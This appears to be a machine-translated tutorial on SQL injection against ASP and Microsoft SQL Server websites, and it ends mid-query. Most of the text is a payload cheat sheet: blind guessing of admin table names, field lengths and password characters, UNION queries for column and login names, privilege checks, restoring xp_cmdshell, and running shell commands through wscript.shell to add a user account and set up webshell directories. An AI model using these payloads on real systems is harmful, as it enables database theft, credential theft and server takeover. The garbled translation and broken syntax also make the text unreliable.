With the development of application development in B/S mode, more and more programmers use this mode to write programs. However, due to the uneven level of programmers, a considerable number of applications have security risks. A user can submit a database query code and obtain some data he wants to know according to the results returned by the program. This is the so-called sqlinjection, that is, SQL injection attack.
the script injects the attacker to insert the SQL command into the input field of the WEB form or the query string requested by the page to trick the server into executing the malicious SQL command. In some forms, the content input by the user is directly used to construct the dynamic SQL command or as the input parameter of the stored procedure, so as to obtain the desired password or information on other servers. Once the data in the website is obtained or modified by someone, that person may gain control of the whole website. As for how to obtain these data, those in MSSQL weak password will not say, and the rest is most likely to use injection vulnerabilities.
when a user submits a parameter outside the website to enter the database for processing, and then sends the processed request to the user, this is the most common dynamic webpage. However, once this parameter is not filtered, so that the sql statements constructed by ourselves can also participate in the database operation together with the parameters, then a SQL injection vulnerability will occur.
It is normal for a website to submit foreign data, and it is generally accepted with parameters and then processed, which involves the database operation. For example, the following example
This address contains the parameter 1 and the variable cs that passes the parameter, which means that there is a 1.asp file in the folder and a cs variable in the 1.asp file, which is used to accept an externally submitted parameter: 1, which can also be other. Then the relevant codes in the file of 1.ASP are generally
for example, the following example:
............................................................................................................................................... cs&'
.......................
Read the contents of the id variable with request, and then make an SQL query. The statement is select * from xx where id = 1, which is easy to understand, but I will use the most classic injection vulnerability detection method and add' after the parameter, and the query statement will become SQL server = select * from xx where ID =' 1', followed by one'.
the principles of and 1=1 and and 1=2 contributed by bamboo are still the same
select * from xx where id = 1 and 1 = 1
select * from xx where id = 1 and 1=2
1 = 1 is valid, but 1 = 2 is not, then the query result is: true and false, and the final result is wrong <
Furthermore, the parameters are followed by SQL statements, such as the update statement:
Update admin set passwd =' poruin' where user =' admin'
The query statement is: select * from xx where id = 1;; And update admin set passwd =' poruin' where user =' admin'
This vulnerability exists not only in ASP Access, ASP SQL Server, PHP MySQL, JSP Oracle, etc.
the above is the injection of SQL statements and Dll. In fact, a new thread is created in the target process to load DLL, which does not affect the actual file of DLL. 1. judge whether there is an injection point
; And 1=1 and 1=2
2. Guess the name of the general table is nothing more than admin adminuser pass password, etc ..
and <; > (select count(*) from *)
and < > (select count (*) from admin)-judge whether there is an admin table
3. Guess the number of accounts if you encounter <; Back to the correct page 1 <; ; The error page returned indicates that the number of accounts is 1
and <; (select count(*) from admin)
and 1< (select count(*) from admin)
4. guess the field name and add the field name we think in the brackets of len ().
and 1 = (select count (*) from admin where len (*) > )-
and 1 = (select count (*) from admin where len (user field name)> )
and1 = (select count (*) from admin where len (password)> field name) > )
5. Guess the length of each field. Guess the length is to put >: transform until the correct page is returned
and 1 = (select count (*) from admin where len (*) > )
and 1=(select count(*) from admin where len(name)> 6) Error
and 1 = (select count (*) from admin where len (name) > 5) The correct length is 6
and 1 = (select count (*) from admin where len (name) = 6) Correct
and 1 = (select count (*) from admin where len (password) > 11) Correct
and 1 = (select count (*) from admin where len (password) > 12) The error length is 12
and 1 = (select count (*) from admin where len (password) = 12) Correct
6. Guess the characters
and 1 = (select count (*) from admin where left (name, 1) = a)-guess the first digit of the user account
and 1 = (select count (*) from admin where left (name, 2) = ab)-guess the second digit of the user account
just add one character at a time, and guess how many digits you just guessed. Even if the account number comes out,
and1 = (select top 1 count (*) from admin where ASC (mid (pass, 5, 1) = 51)-
This query statement can guess the Chinese user and password. Just change the number behind it into the Chinese ASSIC code. Finally, convert the result into characters.
Group by users. ID having 1 = 1-
Group by users. ID, users.username, users.password, users.privity. insert into users values( 666,attacker,foobar, xffff ) --
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHE MA.COLUMNS WHERE TABLE_NAME=logintable WHERE COLUMN_NAME NOT IN
(login_id)-
(login_id, login_name) -
union select top 1 login _ name from logistical-
union select top 1 password from logistical where login _ name = Rahul-
Look at the patch made by the server = an error has been patched with SP4
and 1. = (select @ @ version)-
Look at the permissions of the database connection account, and it returns to normal, which proves that it is the permissions of the server role sysadmin.
and 1 = (select is _ srvrolemember (sysadmin))-
determine the account number of the connection database. (using SA account to connect back to normal = proving that the connection account is sa)
and sa = (select system _ user)-
and user _ name () = dbo-
and <; > (select user _ name ()-
see if xp_cmdshell is deleted
and 1 = (select count (*) from master.dbo.sysobjects where xtype = x and name = XP _ cmdshell)-
XP _ cmdshell is deleted and restored, which supports the restoration of absolute paths
; EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog7.dll--
; Execmaster.dbo.sp _ addextendedprocxp _ cmdshell, c: \ inetpub \ wwwrootog7.dll-
PING yourself in the opposite direction
; use master; declare @s int; exec sp_oacreate wscript.shell,@s out; exec sp_oamethod @s,run,NULL,cmd.exe /c ping 192.168..1; -
add account number
; Declare @ shell int exec sp _ oacreatewscript.shell, @ shell output exec sp _ oamethod @ shell, run, null, c: \ winnt \ system32 \ cmd.exe
/cnet userjiaonian $1866574/add-
Create a virtual directory E disk: Declare @ o int exec sp _ oacreatewscript.shell, @ o out exec sp _ oamethod @ o, run, null, cscript.exec: \ inetpub \ wwwroot \ mkwebdir.vbs-w Default Web site-V e, e: \ -
access attribute: (written in a webshell)
declare @ o int execsp _ oacreatewscript.shell, @ o out execsp _ oamethod @ o, run, null, cscript.exec: \ inetpub \ wwwroot \ Chaccess. VBS-AW3SVC/1/root/e+browse
Special skills for library explosion:: %5c=\ or submit/and \ modify %5
and <; > (select top 1 paths from new table)-
get the library name (from 1 to 5 is the system id, and it can be judged only after 6)
and 1 = (select name from master.dbo.sysdatabases where dbid = 7)-
and <; > (select count(*) from master.dbo.sysdatabases where name> 1 and dbid=6)
submit dbid = 7,8,9 ... in turn to get more database names
and <; > (select top 1 name from BBS. dbo.sysobjects where xtype = u) bursts into a table, assuming that it is admin
and <; > (select top 1 name from bbs.dbo.sysobjects where x